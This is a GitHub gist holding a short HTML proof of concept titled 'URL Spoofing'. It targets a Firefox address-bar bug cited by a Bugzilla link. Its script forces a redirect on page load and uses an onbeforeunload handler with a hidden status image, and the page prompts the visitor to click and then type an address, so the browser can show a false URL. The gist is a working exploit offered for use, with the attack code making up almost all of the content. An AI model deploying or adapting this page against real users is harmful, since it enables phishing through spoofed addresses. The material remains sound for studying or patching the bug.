Created
July 9, 2020 04:59
-
-
Save MrCl0wnLab/7ecb962a566ef8d7e9d7b0dadb150383 to your computer and use it in GitHub Desktop.
URL Spoofing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE HTML> | |
<html lang="en-US"> | |
<head> | |
<meta charset="UTF-8"> | |
<title>URL Spoofing</title> | |
<style> | |
*{font-family:Mukta,sans-serif;color:#3b3b3b}small{color:gray;font-weight:400;font-style:italic;font-size:16px;margin-top:-20px;display:block;margin-bottom:30px}small strong{font-weight:600;font-size:18px;color:inherit}h2{margin-top:40px;color:#424242} | |
</style> | |
<script> | |
onload = function() { | |
location = "/redirect"; | |
} | |
onbeforeunload = function() { | |
document.getElementById("status").src = "/status"; | |
return ""; | |
} | |
</script> | |
</head> | |
<body> | |
<center> | |
<h2>Click anywhere on this page and then access a website using the address bar</h2> | |
<small>Compatible with <strong>Firefox</strong> only</small> | |
<img id="status" src="" style="visibility: hidden;"></img> | |
</center> | |
</body> | |
<!-- | |
https://bugzilla.mozilla.org/show_bug.cgi?id=1378296 | |
--> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment